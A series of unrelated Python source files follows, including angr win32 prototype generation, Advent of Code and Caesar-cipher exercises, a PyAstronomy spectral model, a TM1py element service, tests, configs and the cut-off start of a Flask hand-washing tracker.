"WmiQueryAllDataW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiQuerySingleInstanceA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfOldestRecord": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction002": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetEntriesInAccessListW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaSetQuotasForAccount": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredReadByTokenHandle": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction004": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaICLookupNamesWithCreds": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction023": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction011": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiNotificationRegistrationW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction021": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiReceiveNotificationsA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"MD5Final": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
}
for lib, decls in missing_declarations.items():
for func, proto in decls.items():
parsed_cprotos[lib].append((func, proto, ""))
# Write to files
header = """# pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, \
SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, \
SimTypePointer, \
SimTypeChar, \
SimStruct, \
SimTypeFixedSizeArray, \
SimTypeBottom, \
SimUnion, \
SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
"""
footer = """ }
lib.set_prototypes(prototypes)
"""
for libname, parsed_cprotos_per_lib in parsed_cprotos.items():
filename = "win32_" + libname.replace(".", "_") + ".py"
with open(filename, "w") as f:
f.write(header)
if libname == "kernel32":
f.write("""lib.add_all_from_dict(P['win32'])
lib.add_alias('EncodePointer', 'DecodePointer')
lib.add_alias('GlobalAlloc', 'LocalAlloc')
lib.add('lstrcatA', P['libc']['strcat'])
lib.add('lstrcmpA', P['libc']['strcmp'])
lib.add('lstrcpyA', P['libc']['strcpy'])
lib.add('lstrcpynA', P['libc']['strncpy'])
lib.add('lstrlenA', P['libc']['strlen'])
lib.add('lstrcmpW', P['libc']['wcscmp'])
lib.add('lstrcmpiW', P['libc']['wcscasecmp'])
""")
elif libname == "ntdll":
f.write("""lib.add('RtlEncodePointer', P['win32']['EncodePointer'])
lib.add('RtlDecodePointer', P['win32']['EncodePointer'])
lib.add('RtlAllocateHeap', P['win32']['HeapAlloc'])
""")
elif libname == "user32":
f.write("""import archinfo
from ...calling_conventions import SimCCCdecl
lib.add('wsprintfA', P['libc']['sprintf'], cc=SimCCCdecl(archinfo.ArchX86()))
""")
f.write(f"lib.set_library_names(\"{libname}.dll\")\n")
f.write("prototypes = \\\n {\n")
f.write(parsedcprotos2py(parsed_cprotos_per_lib))
f.write(footer)
def main():
_args = ArgumentParser(description='Build a typelib from win32json project')
_args.add_argument("win32json_api_directory")
_args.add_argument("-v", action="count", help="Increase logging verbosity. Can specify multiple times.")
args = _args.parse_args()
if args.v is not None:
logging.basicConfig(level=max(30 - (args.v * 10), 0))
do_it(args.win32json_api_directory, None)
if __name__ == "__main__":
main()
|
INPUTPATH = "input.txt"
#INPUTPATH = "input-test.txt"
with open(INPUTPATH) as ifile:
raw = ifile.read()
lower, upper = map(int, raw.strip().split("-"))
passwords = tuple(map(str, range(lower, upper + 1)))
from itertools import groupby
from typing import Callable
def valid(group_size_rule: Callable[[int], bool], password: str) -> bool:
nondecreasing = all(a <= b for a, b in zip(password, password[1:]))
has_valid_group = any(
group_size_rule(sum(1 for _ in group))
for _, group in groupby(password)
)
return nondecreasing and has_valid_group
print(sum(1 for p in passwords if valid(lambda s: s > 1, p)))
print(sum(1 for p in passwords if valid(lambda s: s == 2, p)))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Class definition Dog
By: Steve Lammers, Steven.Lammers@UCDenver.edu
"""
# Imports
#import numpy as np
#import matplotlib
class Dog():
"""
Class Description
Args:
_color: string - dog color
_name: string - name of dog
"""
def __init__(self, color, name):
self._color=color
self._name=name
def bark(self):
"""
Make dog bark
"""
print('Woof')
# Top-Level script environment, runs if main file is called as top level
# i.e. runs if the file is called from terminal using python Dog.py
if __name__ == "__main__":
test_dog = Dog('yellow','buddy')
test_dog.bark()
|
# Copyright 2019 The Sonnet Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for sonnet.v2.src.nets.resnet."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
from sonnet.src import test_utils
from sonnet.src.nets import resnet
import tensorflow as tf
class ResnetTest(test_utils.TestCase, parameterized.TestCase):
def setUp(self):
super(ResnetTest, self).setUp()
resnet.TESTONLY_ENABLE_RESNET_V2 = True
@parameterized.parameters(True, False)
def test_simple(self, resnet_v2):
image = tf.random.normal([2, 64, 64, 3])
model = resnet.ResNet([1, 1, 1, 1], 10, resnet_v2=resnet_v2)
logits = model(image, is_training=True)
self.assertIsNotNone(logits)
self.assertEqual(logits.shape, [2, 10])
@parameterized.parameters(True, False)
def test_tf_function(self, resnet_v2):
image = tf.random.normal([2, 64, 64, 3])
model = resnet.ResNet(
[1, 1, 1, 1],
10,
resnet_v2=resnet_v2,
)
f = tf.function(model)
logits = f(image, is_training=True)
self.assertIsNotNone(logits)
self.assertEqual(logits.shape, [2, 10])
self.assertAllEqual(model(image, is_training=True).numpy(), logits.numpy())
@parameterized.parameters(3, 5)
def test_error_incorrect_args_block_list(self, list_length):
block_list = [i for i in range(list_length)]
with self.assertRaisesRegexp(
ValueError, "blocks_per_group_list` must be of length 4 not {}".format(
list_length)):
resnet.ResNet(block_list, 10, {"decay_rate": 0.9, "eps": 1e-5})
@parameterized.parameters(3, 5)
def test_error_incorrect_args_channel_list(self, list_length):
channel_list = [i for i in range(list_length)]
with self.assertRaisesRegexp(
ValueError,
"channels_per_group_list` must be of length 4 not {}".format(
list_length)):
resnet.ResNet([1, 1, 1, 1], 10, {"decay_rate": 0.9, "eps": 1e-5},
channels_per_group_list=channel_list)
def test_v2_throws(self):
resnet.TESTONLY_ENABLE_RESNET_V2 = False
with self.assertRaisesRegexp(NotImplementedError, "please use v1"):
resnet.ResNet([1, 1, 1, 1], 10, resnet_v2=True)
if __name__ == "__main__":
# tf.enable_v2_behavior()
tf.test.main()
|
from __future__ import unicode_literals
# Common Redis constants for discovery and transport classes
REDIS_BACKEND_TYPE_STANDARD = 'redis.standard'
REDIS_BACKEND_TYPE_SENTINEL = 'redis.sentinel'
REDIS_BACKEND_TYPES = (
REDIS_BACKEND_TYPE_STANDARD,
REDIS_BACKEND_TYPE_SENTINEL,
)
DEFAULT_MAXIMUM_MESSAGE_BYTES_CLIENT = 1024 * 100
DEFAULT_MAXIMUM_MESSAGE_BYTES_SERVER = 1024 * 250
|
from flask_wtf import FlaskForm
from wtforms import StringField, IntegerField, SubmitField
class AddForm(FlaskForm):
name = StringField('Name of Puppy:')
submit = SubmitField('Add Puppy')
class DelForm(FlaskForm):
id = IntegerField('Id Number of Puppy to Remove:')
submit = SubmitField('Remove Puppy')
|
from System.Windows import Application
from System.Windows.Controls import UserControl
root = Application.Current.LoadRootVisual(UserControl(), "app.xaml")
root.Message.Text = "Welcome to Python and Silverlight!"
|
from __future__ import print_function, division
from PyAstronomy import funcFit as fuf
from PyAstronomy import pyasl
from PyAstronomy.pyaC import pyaErrors as PE
import numpy as np
import scipy.interpolate as sci
from PyAstronomy.modelSuite import ic
import six.moves as smo
class LLGauss(fuf.OneDFit):
"""
A spectral model based on Gaussian profiles and a line list.
This class provides a simple spectral model based on a number
of Gaussian lines, whose strength may be fitted individually.
Note that the EW of the lines is given by:
`A{n}`*`lineScale`, where `A{n}` is the area of the n-th
Gaussian. The `scale` parameter does not influence the
EW of the Gaussians.
.. note:: The unit of the EWs given in the `lineList` needs
to be the same as the wavelength units.
*Fit parameters*:
- `lineScale` - A common scaling of the area of *all* lines.
- `scale` - A scaling of the *entire* spectrum.
- `eps` - Linear limb-darkening coefficient.
- `vrad` - Radial velocity [km/s].
- `vsini` - Projected stellar rotational velocity [km/s].
- `A{n}` - The amplitudes (area) parameters of the individual Gaussians.
- `sig{n}` - The standard deviations of the individual Gaussian.
- `mu{n}` - The position of the individual Gaussians.
Parameters
----------
onlyAbs : boolean, optional
If True (default), restrictions will be applied, which
prevent emission lines in the spectrum.
lineList : array
An array with either two or three columns. The first column
given the position of the lines, the second gives the EW
of the lines, and the third---if present---gives the depth
of the lines. The depth is the maximal depression of the
continuum, e.g., a value of 0.96 means that the center
of the line of 4% below the continuum. If the depth is given,
the width of the individual Gaussians is determined from it,
unless the `uniSig` is specified.
uniSig : float, optional
Use "unified sigma", i.e., the same width for all lines.
Note that this flag overrules the "depth" column in the
`lineList`, if it has been specified.
modelBinsize : float, optional
Internally, the model should be calculated on a finer grid
than the actual spectrum. This parameter specifies the used
bin size, which is 0.005 by default.
useFastRB : boolean, optional
Use the "fast" rotational broadening algorithm. This algorithm
uses a wavelength-independent broadening kernel, which is
considerably faster than considering the wavelength dependence.
Setting this flag to False is necessary if you use very
long wavelength ranges; by default it is True.
verbose : boolean, optional
If True, the class print the current parameters during the
evaluation.
"""
def __init__(self, lineList, uniSig=None, modelBinsize=0.005, useFastRB=True, verbose=False, onlyAbs=True):
if not ic.check["scipy"]:
raise(PE.PyARequiredImport("Could not import scipy.", \
solution="Install scipy."))
# Check whether depths are given
self._depthsGiven = (len(lineList[0,::]) == 3)
if (not self._depthsGiven) and (uniSig is None):
raise(PE.PyAValError("No width and no depth given.", \
solution="Specify line depth in `lineList` or use `uniSig`."))
# Check whether unified sigma shall be used
# Note: Line depth will be ignored then
self._uniSig = uniSig
# Only absorption lines
self._onlyAbs = onlyAbs
# Verbosity
self._verbose = verbose
# Use fast rotational broadening?
self._usefastRB = useFastRB
# Save binsize for the model
self._modelBinsize = modelBinsize
# Copy line list
self._lineList = lineList.copy()
# Number of lines
self._nl = len(lineList[::,0])
# A MultiGaussFit object
self._mg = fuf.MultiGauss1d(self._nl)
# Store all parameter names from GaussFit
pars = list(self._mg.parameters().keys())
# Remove lin and off from multiGauss keys
pars.remove("lin")
pars.remove("off")
pars.extend(["lineScale", "scale", "eps", "vrad", "vsini"])
fuf.OneDFit.__init__(self, pars)
# Name the model
self.setRootName("LineListGauss")
# Assign start values
for i in range(self._nl):
p = str(i+1)
# Assign position
self._mg["mu"+p] = lineList[i,0]
self["mu"+p] = lineList[i,0]
# Assign amplitude/EW
# Note: Positive EWs correspond to absorption lines
self._mg["A"+p] = -lineList[i,1]
self["A"+p] = lineList[i,1]
# Assign width (sigma)
if self._depthsGiven and (self._uniSig is None):
# Depth IS given and no unified sigma specified
self._mg["sig"+p] = abs(lineList[i,1])/((1.-lineList[i,2]) * np.sqrt(2.*np.pi))
self["sig"+p] = self._mg["sig"+p]
elif not (self._uniSig is None):
# uniSig IS given
self._mg["sig"+p] = self._uniSig
self["sig"+p] = self._mg["sig"+p]
self["scale"] = 1.0
self["lineScale"] = 1.0
if self._onlyAbs:
# Apply restrictions to prevent emission lines
for i in range(self._nl):
p = str(i+1)
self.setRestriction({"A"+p:[0.0, None]})
def thawLineStrengths(self, wlmin=None, wlmax=None):
"""
Thaw line strengths.
Thaws parameters of the from A{n}, where
n is the number of the Gaussian component.
By default all such parameters will be
thawed. The selection may, however, be
influenced by specifying `wlmin` and `wlmax`.
Parameters
----------
wlmin : float, optional
If specified, only the strength of lines at
wavelengths larger than this limits will be thawed.
wlmax : float, optional
If specified, only the strength of lines at
wavelengths below this limit will be thawed.
Returns
-------
Thawed parameters : list
A list of thawed parameter names.
"""
freeAs = []
for i in smo.range(self._nl):
p = str(i+1)
mu = self["mu"+p]
if wlmin is not None:
if mu < wlmin: continue
if wlmax is not None:
if mu >= wlmax: continue
freeAs.append("A"+p)
self.thaw(freeAs)
return freeAs
def thawLineWidths(self, wlmin=None, wlmax=None):
"""
Thaw line widths.
Thaws parameters of the from sig{n}, where
n is the number of the Gaussian component.
By default all such parameters will be
thawed. The selection may, however, be
influenced by specifying `wlmin` and `wlmax`.
Parameters
----------
wlmin : float, optional
If specified, only the strength of lines at
wavelengths larger than this limits will be thawed.
wlmax : float, optional
If specified, only the strength of lines at
wavelengths below this limit will be thawed.
Returns
-------
Thawed parameters : list
A list of thawed parameter names.
"""
freeSigs = []
for i in smo.range(self._nl):
p = str(i+1)
mu = self["mu"+p]
if wlmin is not None:
if mu < wlmin: continue
if wlmax is not None:
if mu >= wlmax: continue
freeSigs.append("sig"+p)
self.thaw(freeSigs)
return freeSigs
def numberOfLines(self):
"""
Get the number of lines in the model.
Returns
-------
Number of lines : int
Number of Gaussian in the model.
"""
return self._nl
def evaluate(self, x):
"""
Calculates the model for current parameters.
The "model" is calculated on a wavelength axis with
binning specified by the `modelBinsize` parameter.
The line positions are Doppler shifted and the resulting
model is rotationally broadened. Finally, the entire
model is multiplied by the `scale` parameter to
account for a global normalization.
Parameters
----------
x : array
The wavelengths at which to calculate the model.
Returns
-------
model : array
The model evaluated at the specified positions.
"""
if self._verbose:
print("Evaluating with parameters: ", self.parameters())
# Calculate how much longer the model wavelength axis should
# be to ensure that Doppler shift and rotational broadening
# to not "violate" its edges.
maxV = abs(self["vsini"]) + abs(self["vrad"])
deltaWvl = max(x) * (1.0 + maxV/299792.458) - max(x)
# The additional summand `_modelBinsize` is needed to ensure
# that the wavelength axis is long enough even if the velocities
# are very small.
mwvl = np.arange(min(x)-deltaWvl, max(x)+deltaWvl+self._modelBinsize, self._modelBinsize)
mflux = np.ones(len(mwvl))
# Set parameters of multiGauss
for i in smo.range(self._nl):
p = str(i+1)
# Apply global scaling of amplitudes
self._mg["A"+p] = -self["A"+p] * self["lineScale"]
self._mg["sig"+p] = self["sig"+p]
# Apply doppler shift of lines
self._mg["mu"+p] = (1.0 + self["vrad"]/299792.458) * self["mu"+p]
mflux += self._mg.evaluate(mwvl)
if abs(self["vsini"]) > 0.0:
if self._usefastRB:
mflux = pyasl.fastRotBroad(mwvl, mflux, self["eps"], np.abs(self["vsini"]))
else:
mflux = pyasl.rotBroad(mwvl, mflux, self["eps"], np.abs(self["vsini"]))
mflux *= self["scale"]
# Return model interpolated at input wavelength
f = sci.interp1d(mwvl, mflux)
return f(x)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2018-06-11 16:43
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('finncon2018', '0002_auto_20180429_2012'),
]
operations = [
migrations.AlterField(
model_name='signupextra',
name='shirt_size',
field=models.CharField(blank=True, choices=[('NO_SHIRT', 'Ei paitaa'), ('XS', 'XS Unisex'), ('S', 'S Unisex'), ('M', 'M Unisex'), ('L', 'L Unisex'), ('XL', 'XL Unisex'), ('XXL', 'XXL Unisex'), ('3XL', '3XL Unisex'), ('4XL', '4XL Unisex'), ('5XL', '5XL Unisex'), ('LF_XS', 'XS Ladyfit'), ('LF_S', 'S Ladyfit'), ('LF_M', 'M Ladyfit'), ('LF_L', 'L Ladyfit'), ('LF_XL', 'XL Ladyfit'), ('LF_2XL', '2XL Ladyfit'), ('LF_3XL', '3XL Ladyfit')], help_text='Ajoissa ilmoittautuneet vänkärit saavat maksuttoman työvoimapaidan, mikäli ilmoittavat työskentelevänsä vähintään 8 tuntia.', max_length=8, null=True, verbose_name='Paidan koko'),
),
migrations.AlterField(
model_name='signupextra',
name='total_work',
field=models.CharField(choices=[('4h', '4–8 tuntia'), ('8h', '8 tuntia'), ('yli8h', 'Yli 8 tuntia')], help_text='Kuinka paljon haluat tehdä töitä yhteensä tapahtuman aikana?', max_length=15, verbose_name='Toivottu kokonaistyömäärä'),
),
]
|
# SPDX-FileCopyrightText: 2020 Hlib Babii <hlibbabii@gmail.com>
#
# SPDX-License-Identifier: Apache-2.0
from codeprep.tokens.numeric import Number
from codeprep.parse.matchers import split_into_words
from codeprep.tokens.containers import SplitContainer
from codeprep.tokens.whitespace import NewLine, SpaceInString
from codeprep.tokens.word import Word, Underscore
from codeprep.parse.subtokens import split_string
def test_split_into_tokens():
actual = split_into_words("123\nAb2cd34Ef000GG j_89_J")
expected = [Number('123'),
NewLine(),
SplitContainer([Word.from_('Ab'), Word.from_('2'), Word.from_('cd'),
Word.from_('34'), Word.from_('Ef'), Word.from_('000'), Word.from_('GG')]),
SplitContainer([Word.from_('j'), Underscore(), Word.from_('89'), Underscore(), Word.from_('J')])]
assert expected == actual
def test_split_string():
actual = split_string("123\nAb2cd34Ef000GG j_89_J")
expected = [Number('123'),
NewLine(),
SplitContainer([Word.from_('Ab'), Word.from_('2'), Word.from_('cd'),
Word.from_('34'), Word.from_('Ef'), Word.from_('000'), Word.from_('GG')]),
SpaceInString(5),
SplitContainer([Word.from_('j'), Underscore(), Word.from_('89'), Underscore(), Word.from_('J')])]
assert expected == actual |
"""
파일 이름 : 14584.py
제작자 : 정지운
제작 날짜 : 2017년 5월 28일
"""
import sys
# 암호문을 입력 받는다.
password = input()
# 단어 개수와 각 단어를 입력받는다.
num = int(input())
# 단어는 리스트에 저장한다.
wordlst = []
for i in range(num):
word = input()
wordlst.append(word)
# 알파벳을 한 칸씩 평행이동하면서 암호문을 검사한다.
# 한 칸씩 평행이동하므로 총 26번을 반복한다.
temp_password = ''
for i in range(1, 27):
# 문자 하나하나씩 평행이동을 시킨다.
for ch in password:
if ch != 'z':
temp_password += chr(ord(ch) + 1)
# 문자가 z인 경우에는 a로 이동시킨다.
else:
temp_password += 'a'
# 단어가 포함되어 있는지 검사한다.
for j in range(num):
# 단어가 포함되어 있으면 그 암호문을 해석한 것이므로 그 암호문을 출력하고 프로그램을 종료한다.
if wordlst[j] in temp_password:
print(temp_password)
sys.exit()
# 단어가 포함되어 있지 못하면 여태까지 해 왔던 것들을 반복한다.
# password를 변경시켜야지 변경된 자리에서 평행이동시킬 수 있다.
password = temp_password
temp_password = '' |
"""Supplementary functions"""
import logging
import logging.config
import os
import yaml
LOGGING_CONFIG_FILEPATH = "logging.conf.yml"
logger = logging.getLogger("ext_summarizer")
def setup_logging():
"""Set up the logger from config file"""
with open(LOGGING_CONFIG_FILEPATH, 'r') as config_fin:
cfg = yaml.safe_load(config_fin)
os.makedirs(os.path.dirname(cfg['handlers']['file_handler']['filename']), exist_ok=True)
logging.config.dictConfig(cfg)
|
# -*- coding: utf-8 -*-
from TM1py.Objects import ElementAttribute, Element
from TM1py.Services.ObjectService import ObjectService
class ElementService(ObjectService):
""" Service to handle Object Updates for TM1 Dimension (resp. Hierarchy) Elements
"""
def __init__(self, rest):
super().__init__(rest)
def get(self, dimension_name, hierarchy_name, element_name):
request = "/api/v1/Dimensions('{}')/Hierarchies('{}')/Elements('{}')?$expand=*"\
.format(dimension_name, hierarchy_name, element_name)
response = self._rest.GET(request)
return Element.from_dict(response.json())
def create(self, dimension_name, hierarchy_name, element):
request = "/api/v1/Dimensions('{}')/Hierarchies('{}')/Elements".format(dimension_name, hierarchy_name)
return self._rest.POST(request, element.body)
def update(self, dimension_name, hierarchy_name, element):
request = "/api/v1/Dimensions('{}')/Hierarchies('{}')/Elements('{}')".format(dimension_name, hierarchy_name,
element.name)
return self._rest.PATCH(request, element.body)
def exists(self, dimension_name, hierarchy_name, element_name):
request = "/api/v1/Dimensions('{}')/Hierarchies('{}')/Elements('{}')".format(dimension_name, hierarchy_name,
element_name)
return self._exists(request)
def delete(self, dimension_name, hierarchy_name, element_name):
request = "/api/v1/Dimensions('{}')/Hierarchies('{}')/Elements('{}')".format(dimension_name, hierarchy_name,
element_name)
return self._rest.DELETE(request)
def get_elements(self, dimension_name, hierarchy_name):
request = "/api/v1/Dimensions('{}')/Hierarchies('{}')/Elements?$expand=*"\
.format(dimension_name, hierarchy_name)
response = self._rest.GET(request)
return [Element.from_dict(element) for element in response.json()["value"]]
def get_leaf_elements(self, dimension_name, hierarchy_name):
request = "/api/v1/Dimensions('{}')/Hierarchies('{}')/Elements?$expand=*&$filter=Type ne 3"\
.format(dimension_name, hierarchy_name)
response = self._rest.GET(request)
return [Element.from_dict(element) for element in response.json()["value"]]
def get_leaf_element_names(self, dimension_name, hierarchy_name):
request = '/api/v1/Dimensions(\'{}\')/Hierarchies(\'{}\')/Elements?$select=Name&$filter=Type ne 3'.format(
dimension_name,
hierarchy_name)
response = self._rest.GET(request, '')
return (e["Name"] for e in response.json()['value'])
def get_element_names(self, dimension_name, hierarchy_name):
""" Get all elementnames
:param dimension_name:
:param hierarchy_name:
:return: Generator of element-names
"""
request = '/api/v1/Dimensions(\'{}\')/Hierarchies(\'{}\')/Elements?$select=Name'.format(dimension_name,
hierarchy_name)
response = self._rest.GET(request, '')
return (e["Name"] for e in response.json()['value'])
def get_element_attributes(self, dimension_name, hierarchy_name):
""" Get element attributes from hierarchy
:param dimension_name:
:param hierarchy_name:
:return:
"""
request = '/api/v1/Dimensions(\'{}\')/Hierarchies(\'{}\')/ElementAttributes'.format(dimension_name,
hierarchy_name)
response = self._rest.GET(request, '')
element_attributes = [ElementAttribute.from_dict(ea) for ea in response.json()['value']]
return element_attributes
def get_elements_filtered_by_attribute(self, dimension_name, hierarchy_name, attribute_name, attribute_value):
""" Get all elements from a hierarchy with given attribute value
:param dimension_name:
:param hierarchy_name:
:param attribute_name:
:param attribute_value:
:return: List of element names
"""
attribute_name = attribute_name.replace(" ", "")
if isinstance(attribute_value, str):
request = "/api/v1/Dimensions('{}')/Hierarchies('{}')" \
"?$expand=Elements($filter = Attributes/{} eq '{}';$select=Name)" \
.format(dimension_name, hierarchy_name, attribute_name, attribute_value)
else:
request = "/api/v1/Dimensions('{}')/Hierarchies('{}')" \
"?$expand=Elements($filter = Attributes/{} eq {};$select=Name)" \
.format(dimension_name, hierarchy_name, attribute_name, attribute_value)
response = self._rest.GET(request)
return [elem['Name'] for elem in response.json()['Elements']]
def create_element_attribute(self, dimension_name, hierarchy_name, element_attribute):
""" like AttrInsert
:param dimension_name:
:param hierarchy_name:
:param element_attribute: instance of TM1py.ElementAttribute
:return:
"""
request = "/api/v1/Dimensions('{}')/Hierarchies('{}')/ElementAttributes" \
.format(dimension_name, hierarchy_name)
return self._rest.POST(request, element_attribute.body)
def delete_element_attribute(self, dimension_name, hierarchy_name, element_attribute):
""" like AttrDelete
:param dimension_name:
:param hierarchy_name:
:param element_attribute: instance of TM1py.ElementAttribute
:return:
"""
request = "/api/v1/Dimensions('}}ElementAttributes_{}')/Hierarchies('}}ElementAttributes_{}')/Elements('{}')" \
.format(dimension_name, hierarchy_name, element_attribute)
return self._rest.DELETE(request, '')
def get_leaves_under_consolidation(self, dimension_name, hierarchy_name, consolidation, max_depth=None):
""" Get all leaves under a consolidated element
:param dimension_name: name of dimension
:param hierarchy_name: name of hierarchy
:param consolidation: name of consolidated Element
:param max_depth: 99 if not passed
:return:
"""
return self.get_members_under_consolidation(dimension_name, hierarchy_name, consolidation, max_depth, True)
def get_members_under_consolidation(self, dimension_name, hierarchy_name, consolidation, max_depth=None,
leaves_only=False):
""" Get all members under a consolidated element
:param dimension_name: name of dimension
:param hierarchy_name: name of hierarchy
:param consolidation: name of consolidated Element
:param max_depth: 99 if not passed
:param leaves_only: Only Leaf Elements or all Elements
:return:
"""
depth = max_depth if max_depth else 99
# members to return
members = []
# Build request
bare_request = "/api/v1/Dimensions('{}')/Hierarchies('{}')/Elements('{}')?$select=Name,Type&$expand=Components("
request = bare_request.format(dimension_name, hierarchy_name, consolidation)
for _ in range(depth):
request += "$select=Name,Type;$expand=Components("
request = request[:-1] + ")" * depth
response = self._rest.GET(request)
consolidation_tree = response.json()
# recursive function to parse consolidation_tree
def get_members(element):
if element["Type"] == "Numeric":
members.append(element["Name"])
elif element["Type"] == "Consolidated":
if "Components" in element:
for component in element["Components"]:
if not leaves_only:
members.append(component["Name"])
get_members(component)
get_members(consolidation_tree)
return members
|
import pendulum
from app.api.business.agreement_business import get_old_agreements
from tests.app.helpers import BaseApplicationTest
class TestOldAgreement(BaseApplicationTest):
def setup(self):
super(TestOldAgreement, self).setup()
def test_old_agreement_end_dates_are_in_the_past(self, master_agreements):
old_agreements = get_old_agreements()
now = pendulum.now('utc')
assert len(old_agreements) == 2
for agreement in old_agreements:
assert agreement.end_date < now
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'Insolar'
copyright = '2020, Insolar'
author = 'Insolar team'
# The full version, including alpha/beta/rc tags
release = '1.0'
version = 'latest'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
# 'sphinxcontrib.golangdomain',
'sphinx_tabs.tabs',
'sphinxcontrib.plantuml',
'sphinx_copybutton',
'sphinxcontrib.contentui'
]
plantuml_output_format = 'svg'
plantuml_latex_output_format = 'png'
master_doc = 'index'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
html_logo = 'imgs/Logo_light.png'
html_theme_options = {
'display_version': True,
'prev_next_buttons_location': 'bottom',
'style_external_links': False,
'display_version': True,
'style_nav_header_background': '#343131',
'logo_only': True,
# Toc options
'collapse_navigation': False,
'sticky_navigation': True,
'navigation_depth': 4,
'includehidden': True,
'titles_only': False
}
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
'pointsize': '11pt',
# Additional stuff for the LaTeX preamble.
'preamble': r'''
\usepackage{charter}
\usepackage[defaultsans]{lato}
\usepackage{inconsolata}
''',
}
latex_logo = 'imgs/Logo_color@2x.png'
|
#import matplotlib
#matplotlib.use('Agg')
from flask import Flask, render_template, Response
import sys
import time
import logging
import subprocess
import cv2
from collections import deque
from tracker import Tracker
import numpy as np
from scipy.optimize import linear_sum_assignment as linear_assignment
from pedestrian_detection_ssdlite import api
from reid import cam_reid
from matplotlib import pyplot as plt
#for hand detection
from utils import detector_utils_washhand as detector_utils
import tensorflow as tf
import datetime
import argparse
#load the hand detection graph and set arg for hand detection
detection_graph, sess = detector_utils.load_inference_graph()
num_hands_detect = 3
score_thresh = 0.2
im_width, im_height = (cap.get(3), cap.get(4))
sink_loc= [(440,359),(504,452)]
patient_loc= [(126,358),(226,481)]
# global variables to be used in the code for tracker
max_age=5
min_hits=1
app = Flask(__name__)
logging.basicConfig(
stream=sys.stdout,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
datefmt=' %I:%M:%S ',
level="INFO"
)
logger = logging.getLogger('detector')
'''
def open_cam_onboard(width, height):
# On versions of L4T prior to 28.1, add 'flip-method=2' into gst_str
gst_str = ('nvcamerasrc ! '
'video/x-raw(memory:NVMM), '
'width=(int)2592, height=(int)1458, '
